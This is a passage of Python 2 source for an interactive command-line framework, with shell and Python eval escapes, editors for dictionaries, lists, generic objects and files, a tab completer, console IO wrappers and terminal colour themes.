^D exits.\")\n\t\tif readline:\n\t\t\treadline.set_completer(oc)\n\t\tsys.ps1, sys.ps2 = saveps1, saveps2\n\t\tself._reset_scopes()\n\n\tdef _get_ns(self):\n\t\ttry:\n\t\t\tname = self._obj.__class__.__name__.lower()\n\t\texcept:\n\t\t\tname = \"object\"\n\t\treturn {name:self._obj, \"environ\":self._environ}\n\n\nclass BaseCommands(BaseCLI):\n\t\"\"\"Extends the BaseCLI with common commands that enable calling other\n\tprograms, repeating commands, etc.\"\"\"\n\tdef __del__(self):\n\t\tself._stop()\n\n\tdef __call__(self, argv):\n\t\tif argv[0].startswith(\"#\"): # comment\n\t\t\treturn 0\n\t\telif argv[0].startswith(\"!\"): # bang-escape reads pipe\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"pipe\")\n\t\telif argv[0].startswith(\"%\"): # percent-escape spawns pty\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"spawn\")\n\t\telif argv[0].startswith(\"@\"): # python exec escape\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"pyexec\")\n\t\telif argv[0].startswith(\"=\"): # python eval escape\n\t\t\targv[0] = argv[0][1:]\n\t\t\targv.insert(0, \"pyeval\")\n\t\tsuper(BaseCommands, self).__call__(argv)\n\n\n\t################################\n\t# actual commands follow (no leading '_' and has a docstring.)\n\t#\n\tdef pipe(self, argv):\n\t\t\"\"\"pipe <command>\n Runs a shell command via a pipe, and prints its stdout and stderr. You may\n also prefix the command with \"!\" to run \"pipe\". \"\"\"\n\t\timport proctools\n\t\targv = globargv(argv)\n\t\tproc = proctools.spawnpipe(\" \".join(argv))\n\t\ttext = proc.read()\n\t\tself._print(text)\n\t\tproc.close()\n\t\treturn proc.wait()\n\n\tdef spawn(self, argv):\n\t\t\"\"\"spawn <command>...\n Spawn another process (uses a pty). You may also prefix the command\n with \"%\" to run spawn.\"\"\"\n\t\timport proctools\n\t\targv = globargv(argv)\n\t\tproc = proctools.spawnpty(\" \".join(argv))\n\t\tcmd = self.clone(FileCLI)\n\t\tcmd._setup(proc, \"Process:%s> \" % (proc.cmdline.split()[0],))\n\t\traise NewCommand, cmd\n\n\tdef repeat_command(self, argv):\n\t\t\"\"\"repeat_command <interval> <command> [<args>...]\n Repeats a command every <interval> seconds. If <interval> is zero then\n loop forever (or until interrupted). If <interval> is negative then loop\n with a count of the absolute value of <interval>.\"\"\"\n\t\tif self._repeater:\n\t\t\tself._print(\"Repeat command already defined. Run 'stop' first.\")\n\t\t\treturn\n\t\targv.pop(0) # eat name\n\t\tinterval = int(argv.pop(0))\n\t\targv = self._expand_aliases(argv)\n\t\tmeth = getattr(self, argv[0])\n\t\tif interval > 0:\n\t\t\twr = _RepeatWrapper(self._ui._io, meth, (argv,))\n\t\t\tself._repeater = timer.add(interval, 0, wr, repeat=1)\n\t\telif interval == 0:\n\t\t\ttry:\n\t\t\t\twhile 1:\n\t\t\t\t\tapply(meth, (argv,))\n\t\t\t\t\t# OOO cheat a little. 
This is need to keep PagedIO\n\t\t\t\t\t# from asking to press a key.\n\t\t\t\t\tself._ui._io.read(0)\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tpass\n\t\telse:\n\t\t\tfor i in xrange(-interval):\n\t\t\t\tapply(meth, (argv,))\n\n\tdef stop_repeater(self, argv):\n\t\t\"\"\"stop_repeater\n Stops a repeating command.\"\"\"\n\t\tself._stop()\n\n\tdef _stop(self):\n\t\tif self._repeater:\n\t\t\ttimer.remove(self._repeater)\n\t\t\tself._repeater = None\n\n\tdef schedule(self, argv):\n\t\t\"\"\"schedule <delay> <command> [<args>...]\n Schedules a command to run <delay> seconds from now.\"\"\"\n\t\targv.pop(0) # eat name\n\t\tdelay = int(argv.pop(0))\n\t\targv = self._expand_aliases(argv)\n\t\tmeth = getattr(self, argv[0])\n\t\ttimer.add(delay, 0, meth, (argv,), repeat=0)\n\n\t# 'hidden' commands (no doc string) follow\n\tdef pyeval(self, argv):\n\t\tsnippet = \" \".join(argv[1:]).strip()+\"\\n\"\n\t\tns = self._get_ns()\n\t\ttry:\n\t\t\tcode = compile(snippet, '<CLI>', 'eval')\n\t\t\trv = eval(code, globals(), ns)\n\t\texcept:\n\t\t\tt, v, tb = sys.exc_info()\n\t\t\tself._print('*** %s (%s)' % (t, v))\n\t\telse:\n\t\t\tself._print(rv)\n\t\t\treturn rv\n\n\tdef pyexec(self, argv):\n\t\tsnippet = \" \".join(argv[1:]).strip()+\"\\n\"\n\t\tns = self._get_ns()\n\t\ttry:\n\t\t\tcode = compile(snippet, '<CLI>', 'exec')\n\t\t\texec code in globals(), ns\n\t\texcept:\n\t\t\tt, v, tb = sys.exc_info()\n\t\t\tself._print('*** %s (%s)' % (t, v))\n\n\n# This is needed to reset PagedIO so background events don't cause the pager to activate.\nclass _RepeatWrapper(object):\n\tdef __init__(self, io, meth, args):\n\t\tself.io = io\n\t\tself.meth = meth\n\t\tself.args = args\n\tdef __call__(self):\n\t\tapply(self.meth, self.args)\n\t\tself.io.read(0) \n\ndef globargv(argv):\n\tif len(argv) > 2:\n\t\timport glob\n\t\tl = []\n\t\tmap(lambda gl: l.extend(gl), map(lambda arg: glob.has_magic(arg) and glob.glob(arg) or [arg], argv[2:]))\n\t\targv = argv[0:2] + l\n\treturn argv[1:]\n\n# TODO: should be able to specify value's object type\ndef breakout_args(argv, namespace=None):\n\t\"\"\"convert a list of string arguments (with possible keyword=arg pairs) to\n\tthe most likely objects.\"\"\"\n\targs = []\n\tkwargs = {}\n\tif namespace:\n\t\tif not isinstance(namespace, dict):\n\t\t\traise ValueError, \"namespace must be dict\"\n\telse:\n\t\tnamespace = locals()\n\tfor argv_arg in argv:\n\t\tif argv_arg.find(\"=\") > 0:\n\t\t\t[kw, kwarg] = argv_arg.split(\"=\")\n\t\t\tkwargs[kw.strip()] = _convert(kwarg, namespace)\n\t\telse:\n\t\t\targs.append(_convert(argv_arg, namespace))\n\treturn tuple(args), kwargs\n\ndef _convert(val, namespace):\n\ttry:\n\t\treturn eval(val, globals(), namespace)\n\texcept:\n\t\treturn val\n\n# public \"safe\" evaluator\ndef clieval(val):\n\ttry:\n\t\treturn eval(val)\n\texcept:\n\t\treturn val # just assume some string otherwise\n\n###### Specialized, but generally useful, command sets follow\n\nclass DictCLI(BaseCommands):\n\t\"\"\"Wrap a dictionary-like object and edit it.\"\"\"\n\tdef _setup(self, obj, prompt=\"\"):\n\t\tself._obj = obj # the dictionary object\n\t\tself._environ[\"PS1\"] = \"%s(dict)> \" % (prompt,)\n\t\tself._reset_scopes()\n\n\tdef _reset_scopes(self):\n\t\tnames = map(str, self._obj.keys())\n\t\tself.add_completion_scope(\"get\", names)\n\t\tself.add_completion_scope(\"set\", names)\n\t\tself.add_completion_scope(\"pop\", names)\n\t\tself.add_completion_scope(\"delete\", names)\n\t\n\tdef set(self, argv):\n\t\t\"\"\"set [-t <type>] <name> <value>\n Set the mapping key to 
value. Specify a type of the value with the -t\n option. If not provided the value is simply evaluated.\"\"\"\n\t\tt = clieval\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tname = args[0]\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\tt = eval(optarg, globals(), globals())\n\t\t\t\tif type(t) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\tvalue = t(*tuple(args[1:]))\n\t\tself._obj[name] = value\n\t\tself._reset_scopes()\n\n\tdef get(self, argv):\n\t\t\"\"\"get <key>\n Gets and prints the named value.\"\"\"\n\t\tname = argv[1]\n\t\tv = self._obj.get(name)\n\t\tself._print(repr(v))\n\t\treturn v\n\n\tdef delete(self, argv):\n\t\t\"\"\"delete <key>\n Deletes the given key from the mapping.\"\"\"\n\t\tkey = argv[1]\n\t\tdel self._obj[key]\n\t\tself._reset_scopes()\n\n\tdef clear(self, argv):\n\t\t\"\"\"clear\n Clears the mapping.\"\"\"\n\t\tself._obj.clear()\n\t\tself._reset_scopes()\n\t\n\tdef has_key(self, argv):\n\t\t\"\"\"has_key <key>\n Report whether or not the mapping has the given key.\"\"\"\n\t\tif self._obj.has_key(argv[1]):\n\t\t\tself._print(\"Mapping does contain the key %r.\" % (argv[1],))\n\t\telse:\n\t\t\tself._print(\"Mapping does NOT contain the key %r.\" % (argv[1],))\n\n\tdef keys(self, argv):\n\t\t\"\"\"keys\n Show all mapping keys.\"\"\"\n\t\tself._print_list(map(repr, self._obj.keys()))\n\n\tdef values(self, argv):\n\t\t\"\"\"values\n Show all mapping values.\"\"\"\n\t\tself._print_list(self._obj.values())\n\n\tdef items(self, argv):\n\t\t\"\"\"items\n Show mapping items.\"\"\"\n\t\tfor name, val in self._obj.items():\n\t\t\tself._print(\"%25.25r: %r\" % (name, val))\n\t\t\n\tdef pop(self, argv):\n\t\t\"\"\"pop <key>\n\tPops the given key from the mapping.\"\"\"\n\t\tname = argv[1]\n\t\tobj = self._obj.pop(name)\n\t\tself._print(\"Popped: \", repr(obj))\n\t\tself._reset_scopes()\n\t\treturn obj\n\t\n\tdef length(self, argv):\n\t\t\"\"\"length\n\tDisplay the length of this mapping object.\"\"\"\n\t\tself._print(len(self._obj))\n\n# edit list objects\nclass ListCLI(BaseCommands):\n\t\"\"\"Wrap a list object and edit it.\"\"\"\n\tdef _setup(self, obj, prompt=\"\"):\n\t\tself._obj = obj # the list object\n\t\tself._environ[\"PS1\"] = \"%s(list)> \" % (prompt,)\n\t\tself._reset_scopes()\n\n\tdef _get_object(self, name):\n\t\treturn eval(name, globals(), self._environ)\n\n\tdef show(self, argv):\n\t\t\"\"\"show [<index>]\n\tShow the list, or a particular index.\"\"\"\n\t\tif len(argv) > 1:\n\t\t\tfor s_idx in argv[1:]:\n\t\t\t\tindex = int(s_idx)\n\t\t\t\tself._print(\"%3d: %r\" % (index, self._obj[index]))\n\t\telse:\n\t\t\tfor index, obj in enumerate(self._obj):\n\t\t\t\tself._print(\"%3d: %r\" % (index, obj))\n\n\tdef delete(self, argv):\n\t\t\"\"\"delete <index>\n\tDelete the entry at <index>.\"\"\"\n\t\tindex = int(argv[1])\n\t\tdel self._obj[index]\n\t\n\tdef append(self, argv):\n\t\t\"\"\"append [-t <type>] <obj>\n\tAppends the <obj> to the list. 
Beware that <obj> may not evaluate as you\n\texpect, but simple objects should work.\"\"\"\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tname = args[0]\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\tt = eval(optarg, globals(), globals())\n\t\t\t\tif type(t) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\t\t\tself._obj.append(t(name))\n\t\t\t\treturn\n\t\telse:\n\t\t\tobj = self._get_object(name)\n\t\t\tself._obj.append(obj)\n\n\tdef extend(self, argv):\n\t\t\"\"\"extend [-t type] <object>...\n\tExtends the list with the argument list of converted objects.\"\"\"\n\t\targtype = self._get_object\n\t\tnew = []\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\targtype = eval(optarg, globals(), globals())\n\t\t\t\tif type(argtype) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\tfor name in args:\n\t\t\tnew.append(argtype(name))\n\t\tself._obj.extend(new)\n\n\tdef count(self, argv):\n\t\t\"\"\"count <object>\n\tCounts number of <object> in list.\"\"\"\n\t\tobj = self._get_object(argv[1])\n\t\tcount = self._obj.count(obj)\n\t\tself._print(count)\n\t\treturn count\n\t\n\tdef index(self, argv):\n\t\t\"\"\"index <object>\n\tReturns the index number of <object> in the list.\"\"\"\n\t\tobj = self._get_object(argv[1])\n\t\ti = self._obj.index(obj)\n\t\tself._print(i)\n\t\treturn i\n\t\n\tdef insert(self, argv):\n\t\t\"\"\"insert <index> <object>\n\tInserts the <object> at <index>.\"\"\"\n\t\targtype = self._get_object\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\targtype = eval(optarg, globals(), globals())\n\t\t\t\tif type(argtype) is not type:\n\t\t\t\t\traise ValueError, \"Argument to -t is not a type\"\n\t\tindex = int(args[0])\n\t\tobj = argtype(args[1])\n\t\tself._obj.insert(index, obj)\n\t\n\tdef pop(self, argv):\n\t\t\"\"\"pop [<index>]\n\tPops the <index>'th item from the list. If <index> not given then pop the last item.\"\"\"\n\t\tif len(argv) > 1:\n\t\t\ti = int(argv[1])\n\t\t\tobj = self._obj.pop(i)\n\t\telse:\n\t\t\tobj = self._obj.pop()\n\t\tself._print(\"Popped: %r\" % (obj,))\n\t\treturn obj\n\t\n\tdef remove(self, argv):\n\t\t\"\"\"remove <object>\n\tRemove the <object> from the list.\"\"\"\n\t\tobj = self._get_object(argv[1])\n\t\treturn self._obj.remove(obj)\n\t\n\tdef reverse(self, argv):\n\t\t\"\"\"reverse\n\tReverses the order of the list.\"\"\"\n\t\tself._obj.reverse()\n\t\n\tdef sort(self, argv):\n\t\t\"\"\"sort\n\tSorts, in place, the list.\"\"\"\n\t\tself._obj.sort()\n\n\n### objects for creating quick and dirty (generic) CLI objects that let\n#you interact with another object's methods.\nclass GenericCLI(BaseCommands):\n\t\"\"\"GenericCLI() Generic Object editor commands.\nWraps any object and allows inspecting and altering it. Use the\nget_generic_cli() factory function to get one of these with extra\nmethods/commands that correspond to the wrapped objects methods. 
\"\"\"\n\n\tdef _generic_call(self, argv):\n\t\tmeth = getattr(self._obj, argv[0])\n\t\targs, kwargs = breakout_args(argv[1:], vars(self._obj))\n\t\trv = apply(meth, args, kwargs)\n\t\tself._print(rv)\n\t\n\tdef _reset_scopes(self):\n\t\tnames = filter(lambda n: not n.startswith(\"__\"), dir(self._obj))\n\t\tself.add_completion_scope(\"show\", names)\n\t\tself.add_completion_scope(\"call\", [n for n in names if callable(getattr(self._obj, n))])\n\t\tself.add_completion_scope(\"set\", names)\n\t\tself.add_completion_scope(\"get\", names)\n\t\tself.add_completion_scope(\"delete\", names)\n\n\tdef subshell(self, io, env=None, aliases=None, theme=None):\n\t\tcliclass = self.__class__\n\t\tnewui = UserInterface(io, env or self._environ.copy(), theme)\n\t\taliases = aliases or self._aliases\n\t\tcmd = cliclass(newui, aliases)\n\t\tcmd._obj = self._obj\n\t\treturn cmd\n\n\tdef call(self, argv):\n\t\t\"\"\"call <name> <arg1>...\n\tCalls the named method with the following arguments converted to \"likely types\".\"\"\"\n\t\tself._generic_call(argv[1:])\n\n\tdef show(self, argv):\n\t\t\"\"\"show [<name>]\n Shows a named attribute of the object, or the object itself if no argument given.\"\"\"\n\t\tif len(argv) > 1:\n\t\t\tv = getattr(self._obj, argv[1])\n\t\t\tself._print(v)\n\t\t\treturn v\n\t\telse:\n\t\t\tself._print(self._obj)\n\n\tdef ls(self, argv):\n\t\t\"\"\"ls\n Display a list of the wrapped objects attributes and their types.\"\"\"\n\t\td = dir(self._obj)\n\t\ts = []\n\t\tms = []\n\t\tfor name in d:\n\t\t\tif name.startswith(\"__\") or name.startswith(\"_p_\"): # hide class-private and persistence overhead objects.\n\t\t\t\tcontinue\n\t\t\tattr = getattr(self._obj, name)\n\t\t\tif type(attr) is MethodType:\n\t\t\t\tms.append(\"%22.22s : %s\" % (name, method_repr(attr)))\n\t\t\telse:\n\t\t\t\ts.append(\"%22.22s : %r\" % (name, attr))\n\t\tself._print(\"Methods:\")\n\t\tself._print(\"\\n\".join(ms))\n\t\tself._print(\"Attributes:\")\n\t\tself._print(\"\\n\".join(s))\n\t\treturn d\n\tdir = ls # alias\n\n\tdef set(self, argv):\n\t\t\"\"\"set [-t <type>] <name> <value>\n Sets the named attribute to a new value. The value will be converted into a\n likely suspect, but you can specify a type with the -t flag. 
\"\"\"\n\t\tt = clieval\n\t\toptlist, longoptdict, args = self.getopt(argv, \"t:\")\n\t\tname = args[0]\n\t\tfor opt, optarg in optlist:\n\t\t\tif opt == \"-t\":\n\t\t\t\tt = eval(optarg, globals(), vars(self._obj))\n\t\t\t\tassert type(t) is type, \"Argument to -t is not a type\"\n\t\tvalue = t(*tuple(args[1:]))\n\t\tsetattr(self._obj, name, value)\n\t\tself._reset_scopes()\n\n\tdef get(self, argv):\n\t\t\"\"\"get <name>\n Gets and prints the named attribute.\"\"\"\n\t\tname = argv[1]\n\t\tv = getattr(self._obj, name)\n\t\tself._print(v)\n\t\treturn v\n\n\tdef delete(self, argv):\n\t\t\"\"\"delete <name>\n Delete the named attribute.\"\"\"\n\t\tname = argv[1]\n\t\tdelattr(self._obj, name)\n\t\tself._reset_scopes()\n\n\n# used to interact with file-like objects.\nclass FileCLI(GenericCLI):\n\t\"\"\"Commands for file-like objects.\"\"\"\n\tdef read(self, argv):\n\t\t\"\"\"read [amt]\n Read <amt> bytes of data.\"\"\"\n\t\targs, kwargs = breakout_args(argv[1:], vars(self._obj))\n\t\tdata = self._obj.read(*args)\n\t\tself._print(data)\n\t\treturn data\n\n\tdef write(self, argv):\n\t\t\"\"\"write <data>\n Writes the arguments to the file.\"\"\"\n\t\twrit = self._obj.write(\" \".join(argv[1:]))\n\t\twrit += self._obj.write(\"\\r\")\n\t\tself._print(\"wrote %d bytes.\" % (writ,))\n\t\treturn writ\n\t\n\tdef interact(self, argv):\n\t\t\"\"\"interact\n Read and write to the file object. Works best with Process objects.\"\"\"\n\t\tio = self._ui._io\n\t\timport select\n\t\tfrom errno import EINTR\n\t\tescape = chr(29) # ^]\n\t\tself._print(\"\\nEntering interactive mode.\")\n\t\tself._print(\"Type ^%s to stop interacting.\" % (chr(ord(escape) | 0x40)))\n\t\t# save tty state and set to raw mode\n\t\tstdin_fd = io.fileno()\n\t\tfo_fd = self._obj.fileno()\n\t\tttystate = termtools.tcgetattr(stdin_fd)\n\t\ttermtools.setraw(stdin_fd)\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\trfd, wfd, xfd = select.select([fo_fd, stdin_fd], [], [])\n\t\t\texcept select.error, errno:\n\t\t\t\tif errno[0] == EINTR:\n\t\t\t\t\tcontinue\n\t\t\tif fo_fd in rfd:\n\t\t\t\ttry:\n\t\t\t\t\ttext = self._obj.read(1)\n\t\t\t\texcept (OSError, EOFError), err:\n\t\t\t\t\ttermtools.tcsetattr(stdin_fd, termtools.TCSAFLUSH, ttystate)\n\t\t\t\t\tself._print( '*** EOF ***' )\n\t\t\t\t\tself._print( err)\n\t\t\t\t\tbreak\n\t\t\t\tif text:\n\t\t\t\t\tio.write(text)\n\t\t\t\t\tio.flush()\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\tif stdin_fd in rfd:\n\t\t\t\tchar = io.read(1)\n\t\t\t\tif char == escape: \n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself._obj.write(char)\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttermtools.tcsetattr(stdin_fd, termtools.TCSAFLUSH, ttystate)\n\t\t\t\t\t\textype, exvalue, tb = sys.exc_info()\n\t\t\t\t\t\tio.errlog(\"%s: %s\\n\" % (extype, exvalue))\n\t\t\t\t\t\ttermtools.setraw(stdin_fd)\n\t\ttermtools.tcsetattr(stdin_fd, termtools.TCSAFLUSH, ttystate)\n\n# The object's public interface is defined to be the methods that don't\n# have a leading underscore, and do have a docstring.\ndef _get_methodnames(obj):\n\tcls = obj.__class__\n\tfor name in dir(cls):\n\t\tif name[0] == \"_\":\n\t\t\tcontinue\n\t\tcls_obj = getattr(cls, name)\n\t\tif type(cls_obj) is MethodType and cls_obj.__doc__:\n\t\t\tyield name, cls_obj\n\n\n# a completer object for readline and python method. 
Safer than the stock one (no eval).\nclass Completer(object):\n\tdef __init__(self, namespace):\n\t\tassert type(namespace) is dict, \"namespace must be a dict type\"\n\t\tself.namespace = namespace\n\t\tself.globalNamespace = Completer.get_globals()\n\t\tself.globalNamespace.extend(map(str, namespace.keys()))\n\t\tself.matches = []\n\n\tdef complete(self, text, state):\n\t\tif state == 0:\n\t\t\tself.matches = []\n\t\t\tif \".\" in text:\n\t\t\t\tfor name, obj in self.namespace.items():\n\t\t\t\t\tfor key in dir(obj):\n\t\t\t\t\t\tif key.startswith(\"__\"):\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tlname = \"%s.%s\" % (name, key)\n\t\t\t\t\t\tif lname.startswith(text):\n\t\t\t\t\t\t\tself.matches.append(lname)\n\t\t\telse:\n\t\t\t\tfor key in self.globalNamespace:\n\t\t\t\t\tif key.startswith(text):\n\t\t\t\t\t\tself.matches.append(key)\n\t\ttry:\n\t\t\treturn self.matches[state]\n\t\texcept IndexError:\n\t\t\treturn None\n\n\tdef get_globals():\n\t\timport keyword, __builtin__\n\t\trv = keyword.kwlist + dir(__builtin__)\n\t\trv = removedups(rv)\n\t\treturn rv\n\tget_globals = staticmethod(get_globals)\n\n\tdef get_class_members(klass, rv=None):\n\t\tif rv is None:\n\t\t\trv = dir(klass)\n\t\telse:\n\t\t\trv.extend(dir(klass))\n\t\tif hasattr(klass, '__bases__'):\n\t\t\tfor base in klass.__bases__:\n\t\t\t\tCompleter.get_class_members(base, rv)\n\t\treturn rv\n\tget_class_members = staticmethod(get_class_members)\n\ndef get_generic_cmd(obj, ui, cliclass=GenericCLI, aliases=None, gbl=None):\n\t\"\"\"get a GenericCLI (or other) command set wrapping any class instance\n\tobject. The wrapped objects public methods have CLI command counterparts\n\tautomatically created.\"\"\"\n\timport new\n\tfrom basicconfig import MethodHolder\n\tcmd = cliclass(ui, aliases)\n\tif gbl is None:\n\t\tgbl = globals()\n\thashfilter = {}\n\tfor name, obj_meth in _get_methodnames(obj):\n\t\tif hasattr(cmd, name):\n\t\t\tcontinue # don't override already defined methods\n\t\t# all this mess does is introspect the object methods and map it to a CLI\n\t\t# object method of the same name, with a docstring showing the attributes\n\t\t# and their default values, and the actual code mirroring the\n\t\t# _generic_call method in the GenericCLI class.\n\t\telse:\n\t\t\tif id(obj_meth.im_func) in hashfilter: # filter out aliases\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\thashfilter[id(obj_meth.im_func)] = True\n\t\t\tmh = MethodHolder(obj_meth)\n\t\t\tdoc = \"%s *\\n%s\" % (mh, obj_meth.__doc__ or \"\")\n\t\t\tcode = cliclass._generic_call.func_code\n\t\t\tnc = new.code(code.co_argcount, code.co_nlocals, code.co_stacksize, \n\t\t\t\tcode.co_flags, code.co_code, \n\t\t\t\t(doc,)+code.co_consts[1:], # replace docstring\n\t\t\t\tcode.co_names, code.co_varnames, code.co_filename, \n\t\t\t\tcode.co_name, code.co_firstlineno, code.co_lnotab)\n\t\t\tf = new.function(nc, gbl, name)\n\t\t\tm = new.instancemethod(f, cmd, cliclass)\n\t\t\tsetattr(cmd, name, m)\n\tcmd._setup(obj, \"%s:%s\" % (cliclass.__name__, obj.__class__.__name__))\n\treturn cmd\n\ndef get_generic_clone(obj, cli, cliclass=GenericCLI, theme=None):\n\t\"Return a generic clone of an existing Command object.\"\n\tnewui = cli._ui.clone(theme)\n\treturn get_generic_cmd(obj, newui, cliclass, aliases=cli._aliases)\n\ndef get_generic_cli(obj, cliclass=GenericCLI, env=None, aliases=None, theme=None, logfile=None, historyfile=None):\n\t\"\"\" get_generic_cli(obj, cliclass=GenericCLI, env=None, aliases=None)\nReturns a generic CLI object with command methods mirroring the 
public\nmethods in the supplied object. Ready to interact() with! \"\"\"\n\tio = ConsoleIO()\n\tui = UserInterface(io, env, theme)\n\tcmd = get_generic_cmd(obj, ui, cliclass, aliases)\n\tcmd._export(\"PS1\", \"%s> \" % (obj.__class__.__name__,))\n\tcli = CommandParser(cmd, logfile, historyfile)\n\treturn cli\n\n# this class is indended to be wrapped by GenericCLI as a general Python CLI.\n# It does nothing but allow GenericCLI to pass through its basic functionality.\nclass Shell(object):\n\t\"\"\"A simple class for testing object wrappers.\"\"\"\n\tdef __init__(self, *iargs, **ikwargs):\n\t\tself.initargs = iargs\n\t\tself.initkwargs = ikwargs\n\n\tdef callme(self, *args, **kwargs):\n\t\tPrint(\"args:\", args)\n\t\tPrint(\"kwargs:\", kwargs)\n\n\n# wraps stdio to look like a single read-write object. Also provides additional io methods.\n# The termtools.PagedIO object should have all the same methods as this class.\nclass ConsoleIO(object):\n\tdef __init__(self):\n\t\tself.stdin = sys.stdin\n\t\tself.stdout = sys.stdout\n\t\tself.stderr = sys.stderr\n\t\tself.mode = \"rw\"\n\t\tself.closed = 0\n\t\tself.softspace = 0\n\t\t# reading methods\n\t\tself.read = self.stdin.read\n\t\tself.readline = self.stdin.readline\n\t\tself.readlines = self.stdin.readlines\n\t\tself.xreadlines = self.stdin.xreadlines\n\t\t# writing methods\n\t\tself.write = self.stdout.write\n\t\tself.flush = self.stdout.flush\n\t\tself.writelines = self.stdout.writelines\n\t\n\tdef raw_input(self, prompt=\"\"):\n\t\treturn raw_input(prompt)\n\n\tdef close(self):\n\t\tself.stdout = None\n\t\tself.stdin = None\n\t\tself.closed = 1\n\t\tdel self.read, self.readlines, self.xreadlines, self.write\n\t\tdel self.flush, self.writelines\n\n\tdef fileno(self): # ??? punt, since mostly used by readers\n\t\treturn self.stdin.fileno()\n\n\tdef isatty(self):\n\t\treturn self.stdin.isatty() and self.stdout.isatty()\n\n\tdef errlog(self, text):\n\t\tself.stderr.write(\"%s\\n\" % (text,))\n\t\tself.stderr.flush()\n\nclass ConsoleErrorIO(object):\n\tdef __init__(self):\n\t\tself.stdin = sys.stdin\n\t\tself.stdout = sys.stderr\n\t\tself.stderr = sys.stderr\n\t\tself.mode = \"rw\"\n\t\tself.closed = 0\n\t\tself.softspace = 0\n\t\t# reading methods\n\t\tself.read = self.stdin.read\n\t\tself.readline = self.stdin.readline\n\t\tself.readlines = self.stdin.readlines\n\t\tself.xreadlines = self.stdin.xreadlines\n\t\t# writing methods\n\t\tself.write = self.stderr.write\n\t\tself.flush = self.stderr.flush\n\t\tself.writelines = self.stderr.writelines\n\t\n\tdef raw_input(self, prompt=\"\"):\n\t\treturn raw_input(prompt)\n\n\tdef close(self):\n\t\tself.stdout = None\n\t\tself.stdin = None\n\t\tself.closed = 1\n\t\tdel self.read, self.readlines, self.xreadlines, self.write\n\t\tdel self.flush, self.writelines\n\n\tdef fileno(self): # ??? punt, since mostly used by readers\n\t\treturn self.stdin.fileno()\n\n\tdef isatty(self):\n\t\treturn self.stdin.isatty() and self.stdout.isatty()\n\n\tdef errlog(self, text):\n\t\tself.stderr.write(\"%s\\n\" % (text,))\n\t\tself.stderr.flush()\n\n\n# themes define some basic \"look and feel\" for a CLI. 
This includes prompt strings and color set.\nclass Theme(object):\n\tNORMAL = RESET = \"\"\n\tBOLD = BRIGHT = \"\"\n\tBLACK = \"\"\n\tRED = \"\"\n\tGREEN = \"\"\n\tYELLOW = \"\"\n\tBLUE = \"\"\n\tMAGENTA = \"\"\n\tCYAN = \"\"\n\tWHITE = \"\"\n\tDEFAULT = \"\"\n\tGREY = \"\"\n\tBRIGHTRED = \"\"\n\tBRIGHTGREEN = \"\"\n\tBRIGHTYELLOW = \"\"\n\tBRIGHTBLUE = \"\"\n\tBRIGHTMAGENTA = \"\"\n\tBRIGHTCYAN = \"\"\n\tBRIGHTWHITE = \"\"\n\tUNDERSCORE = \"\"\n\tBLINK = \"\"\n\thelp_local = WHITE\n\thelp_inherited = YELLOW\n\thelp_created = GREEN\n\tdef __init__(self, ps1=\"> \", ps2=\"more> \", ps3=\"choose\", ps4=\"-> \"):\n\t\tself._ps1 = ps1 # main prompt\n\t\tself._ps2 = ps2 # more input needed\n\t\tself._ps3 = ps3 # choose prompt\n\t\tself._ps4 = ps4 # input prompt\n\t\tself._setcolors()\n\tdef _set_ps1(self, new):\n\t\tself._ps1 = str(new)\n\tdef _set_ps2(self, new):\n\t\tself._ps2 = str(new)\n\tdef _set_ps3(self, new):\n\t\tself._ps3 = str(new)\n\tdef _set_ps4(self, new):\n\t\tself._ps4 = str(new)\n\tps1 = property(lambda s: s._ps1, _set_ps1, None, \"primary prompt\")\n\tps2 = property(lambda s: s._ps2, _set_ps2, None, \"more input needed\")\n\tps3 = property(lambda s: s._ps3, _set_ps3, None, \"choose prompt\")\n\tps4 = property(lambda s: s._ps4, _set_ps4, None, \"text input prompt\")\n\nclass BasicTheme(Theme):\n\t\"Base class for themes. Defines interface.\"\n\tdef _setcolors(cls):\n\t\tcls.NORMAL = cls.RESET = \"\\x1b[0m\"\n\t\tcls.BOLD = cls.BRIGHT = \"\\x1b[1m\"\n\t\tcls.BLACK = \"\"\n\t\tcls.RED = \"\"\n\t\tcls.GREEN = \"\"\n\t\tcls.YELLOW = \"\"\n\t\tcls.BLUE = \"\"\n\t\tcls.MAGENTA = \"\"\n\t\tcls.CYAN = \"\"\n\t\tcls.WHITE = \"\"\n\t\tcls.DEFAULT = \"\"\n\t\tcls.GREY = \"\"\n\t\tcls.BRIGHTRED = \"\"\n\t\tcls.BRIGHTGREEN = \"\"\n\t\tcls.BRIGHTYELLOW = \"\"\n\t\tcls.BRIGHTBLUE = \"\"\n\t\tcls.BRIGHTMAGENTA = \"\"\n\t\tcls.BRIGHTCYAN = \"\"\n\t\tcls.BRIGHTWHITE = \"\"\n\t\tcls.UNDERSCORE = \"\\x1b[4m\"\n\t\tcls.BLINK = \"\\x1b[5m\"\n\t\tcls.help_local = cls.WHITE\n\t\tcls.help_inherited = cls.YELLOW\n\t\tcls.help_created = cls.GREEN\n\t_setcolors = classmethod(_setcolors)\n\nclass ANSITheme(BasicTheme):\n\t\"\"\"Defines tunable parameters for the UserInterface, to provide different color schemes and 